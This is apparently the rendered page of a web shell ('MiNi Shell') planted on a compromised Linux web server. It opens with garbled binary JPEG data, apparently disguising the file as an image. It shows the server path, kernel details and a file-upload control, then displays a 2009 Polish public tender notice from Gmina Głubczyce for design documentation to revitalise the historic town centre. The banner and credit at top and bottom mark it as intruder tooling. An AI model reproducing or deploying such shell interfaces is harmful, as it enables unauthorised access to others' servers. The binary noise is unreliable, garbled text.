JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090729/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090729/122469-N-2009.html

<p class="kh_header"><b>Głubczyce: Opracowanie dokumentacji projektowo-kosztorysowej dla zadania pn.      
Rewitalizacja zabytkowego śródmieścia miasta Głubczyce</b><br>
<b>Numer ogłoszenia: 122469 - 2009; data zamieszczenia: 29.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Głubczyce , ul. Niepodległości 14/16, 48-100 Głubczyce, woj. opolskie, tel. 077 4853021 w. 230, faks 077 4852416.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glubczyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej dla zadania pn.      
Rewitalizacja zabytkowego śródmieścia miasta Głubczyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : Opracowanie dokumentacji projektowo-kosztorysowej dla zadania pn. Rewitalizacja zabytkowego śródmieścia miasta Głubczyce
1. Założenia projektu pn. Rewitalizacja zabytkowego śródmieścia miasta Głubczyce
1) Przebudowa ulicy Moniuszki  w tym :
-  remont jezdni wraz z odwodnieniem
- remont chodnika
2) Przebudowa ulicy Bałuckiego w tym :
-  remont jezdni wraz  z odwodnieniem
- remont chodnika
- oświetlenie
- zagospodarowanie parkingu (dz. nr 477/8)
3) Przebudowa ulicy Zakonnej w tym :
-  remont jezdni wraz z odwodnieniem
-  remont chodnika
- zagospodarowanie działki nr 472/2
4) Przebudowa ulicy Krętej w tym : 
-  remont jezdni wraz  z odwodnieniem
- remont chodnika
- remont infrastruktury technicznej (wod-kan)
- oświetlenie
5) Przebudowa ulicy Warszawskiej w tym :
-  remont jezdni wraz z odwodnieniem
- remont chodnika
-  oświetlenie
-zagospodarowanie działki nr 457/30
6) Przebudowa ulicy Klasztornej w tym :
- remont jezdni wraz z odwodnieniem
- remont chodnika
- oświetlenie
7) Przebudowa Placu św. Józefa dz. nr 451/21 w tym :
- remont chodnika
- oświetlenie
- zagospodarowanie placu św. Józefa
Obszar objęty opracowaniem dokumentacji technicznej podlega ścisłej ochronie konserwatorskiej i wymaga uzyskania decyzji konserwatorskiej.
2. Dokumentacja projektowo - kosztosysowa powinna zawierać :
    a) projekt budowlany / 6 egzemplarzy/ - wszystkie branże ,
    b) projekt wykonawczy / 3 egzemplarze/ - wszystkie branże,
    c) przedmiary robót /3 egzemplarze/,
    d) informacja dotycząca bezpieczeństwa i ochrony zdrowia w przypadku gdy jej opracowanie 
        jest wymagane na podstawie odrębnych przepisów / 1 egz./,  
    e) specyfikacji technicznej wykonania i odbioru robót budowlanych/3 egz./
    f)  kosztorysy inwestorskie z podziałem na poszczególne ulice i na branże  /2 egz./
    g)  opracowanie projektu  docelowej organizacji ruchu  /2egz./ 
3. Do obowiązku Projektanta należy :
-  Uzyskanie map  do celów projektowych oraz wypisów z rejestru gruntów.
-  Uzyskanie wszelkich warunków technicznych i dokonanie uzgodnień niezbędnych do realizacji 
    zadania (m.in. Głubczyckie Wodociągi i Kanalizacja, Zakład Energetyczny Kędzierzyn Koźle, 
    Konserwator Zabytków w Opolu).
-  Opracowanie raportu o oddziaływaniu inwestycji na środowisko -  w przypadku gdy będzie 
    wymagany. 
-  Uzyskanie decyzji o środowiskowych uwarunkowaniach zgody  na realizację przedsięwzięcia. 
-  Uzyskanie wypisu i wyrysu z planu zagospodarowania przestrzennego miasta Głubczyce.
-  Uzyskanie pozwolenia konserwatorskiego. 
-  Opracowanie , złożenie i uzyskanie  w imieniu Zamawiającego - zgłoszenia bądź  wniosku 
    o  uzyskanie pozwolenia na budowę wraz z niezbędną dokumentacją. oraz uzyskaniem 
    pozwolenia na budowę.
- Opracowanie Studium wykonalności zgodnie z Wytycznymi do Regionalnego Programu   
   Operacyjnego Województwa Opolskiego na lata 2007-2013 - 3 egz. 
4.Dokumentację projektową należy wykonać z należytą starannością wraz z wszelkimi niezbędnymi uzgodnieniami i uzyskaniem pozwolenia na budowę zgodnie wymaganiami ustaw, a w szczególności:
- Ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. Nr 156 z 2006 r.   
   póź. 1118 z późn. zm.);
- Ustawy z dnia 3 października 2008r. o udostępnieniu informacji o środowisku i jego  ochronie, 
   udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na   środowisko 
   (Dz. U. z 2008r. Nr 199, póz. 1227)
5.Pełna dokumentacja projektowo - kosztorysowa  oraz specyfikacja techniczna wykonania i odbioru robót  dodatkowo  musi zostać dostarczona w formie elektronicznej : część graficzna w formie JPG lub PDF , część opisowa w formie PDF lub RTF.
6.Wersję elektroniczną dokumentacji należy sporządzić zgodnie z Rozporządzeniem Rady Ministrów z dnia 11 października 2005 r. w sprawie minimalnych wymagań dla systemów teleinformatycznych (Dz.U. Nr 212 Poz. 1766 z 2005r) 
7.Wycena projektu ma uwzględniać wszystkie składniki wyceny wyszczególnione w Środowiskowych Zasadach Wycen Prac Projektowych - 2003 opracowanych przez Izbę Projektowania Budowlanego.
8.Projekt musi odpowiadać przepisom rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i form projektu budowlanego (Dz.U. z 2003 r. NR 120, poz.1133) 
9.Opracowanie kosztowe mają spełniać wymagania określone w:
- rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego 
  zakresu i form dokumentacji projektowej, specyfikacji technicznych  wykonania i odbioru robót 
  budowlanych oraz programu funkcjonalno- użytkowego (Dz.U. z 2004 r. Nr 202 poz. 2072)
- rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 w sprawie określenia metod 
  i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac 
  projektowych oraz planowanych kosztów robot budowlanych określonych w programie 
  funkcjonalno  - użytkowym (Dz. U. z 2004 r. Nr130 poz. 1389).
10.Dokumentacja projektowa będzie służyć jako opis przedmiotu zamówienia do przetargu na roboty budowlane w oparciu o ustawę o prawo zamówień publicznych oraz do realizacji (na jej podstawie) pełnego zakresu robót budowlanych, niezbędnego  dla użytkowania obiektu zgodnie z przeznaczeniem.
11.Dokumentacja projektowa w swej treści powinna określać technologię robót, materiały, maszyny i urządzenia w sposób nie utrudniający uczciwej konkurencji. 
12.Dokumentacja projektowa powinna określać parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych dopuszczonych do obrotu i powszechnie dostępnych na rynku , wybranej technologii,  urządzeń i wyposażenia. uzgodnione   z Zamawiającym na spotkaniach roboczych.
13.Do kompletnej dokumentacji projektant dołączy oświadczenie projektanta o kompletności dokumentacji.
14.Zamawiający wymaga ,aby Wykonawca dokonał wizji lokalnej miejsca objętego pracami projektowymi , aby uzyskał informacje , które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej poniesie Wykonawca.
15.Autor dokumentacji zobowiązuje się do bezpłatnej jednorazowej aktualizacji kosztorysów inwestorskich  jeżeli zajdzie potrzeba ich aktualizacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawcy ubiegający się o zamówienie zgodnie z art.22 ust.1 ustawy Prawo zamówień publicznych muszą spełnić niżej wymienione warunki udziału w postępowaniu:
O udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy :
1)	 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)  posiadają niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i 
     osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych 
     podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
     zamówienia;
     a) Zamawiający wymaga aby Wykonawca wykazał , że w okresie ostatnich trzech lat a jeżeli 
     okres prowadzenia działalności jest krótszy w tym okresie  , należycie wykonał co 
najmniej 1 dokumentację projektową bez względu na jej wartość , dotyczącą budowy,           przebudowy lub remontu drogi.
     Wymogiem jest aby wykazane zamówienia były poparte dokumentami o należytym ich 
     wykonaniu .
3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	  nie podlega wykluczeniu z postępowania o udzielenie zamówienia. 
2. Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych przez Wykonawców dokumentów wymienionych w pkt. 6 SIWZ zgodnie z formułą spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia, że Wykonawca posiadania uprawnienia do  wykonania określonej działalności lub czynności objętych przedmiotem zamówienia oraz   nie podlega wykluczeniu z postępowania wykonawca składa : 
    1) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu o zamówienie 
        publiczne zgodnie z art. 22 ust. 1 pkt 1-3 ustawy, stanowiące załącznik nr 2 do niniejszej
        specyfikacji,
    2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji     
        działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
        zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż                    
        6  miesięcy przed upływem terminu składania ofert.
    3) Oświadczenie Wykonawcy o niepodleganiu  wykluczeniu z udziału w postępowaniu
        o zamówienie publiczne, zgodnie z art. 24 ustawy, stanowiące załącznik nr 3 do niniejszej 
        specyfikacji.
2. W celu potwierdzenia spełnienia warunku posiadania niezbędnej wiedzy i doświadczenia oraz   
    dysponowania  osobami zdolnymi do wykonania zamówienia wykonawca składa : 
    1) wykaz wykonanych , a w przypadku świadczeń okresowych lub ciągłych również 
 wykonywanych  usług w okresie ostatnich trzech lat przed dniem wszczęciem   
 postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy 
 - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym 
 przedmiot zamówienia , z podaniem ich wartości, przedmiotu  dat wykonania i odbiorców 
        oraz załączenia dokumentów potwierdzających, że te usługi  zostały wykonane należycie na 
        formularzu stanowiącym załącznik nr 4 do niniejszej specyfikacji,
        Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich          
        trzech lat przed dniem wszczęcia postępowania o udzielenie  zamówienia , a jeżeli okres 
        prowadzenia działalności jest  krótszy - to w tym okresie , należycie wykonał co najmniej 
        1 dokumentację projektową bez względu na jej wartość , dotyczącą budowy, przebudowy lub remontu drogi.
       Wymogiem jest aby  wykazane zamówienia były poparte dokumentami o należytym ich 
        wykonaniu ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.glubczyce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głubczycach, ul. Niepodległości 14, 48-100 Głubczyce, pokój nr 16.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2009 godzina 10:00, miejsce: Urząd Miejski w Głubczycach, ul. Niepodległości 14, 48-100 Głubczyce, pokój nr 2.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com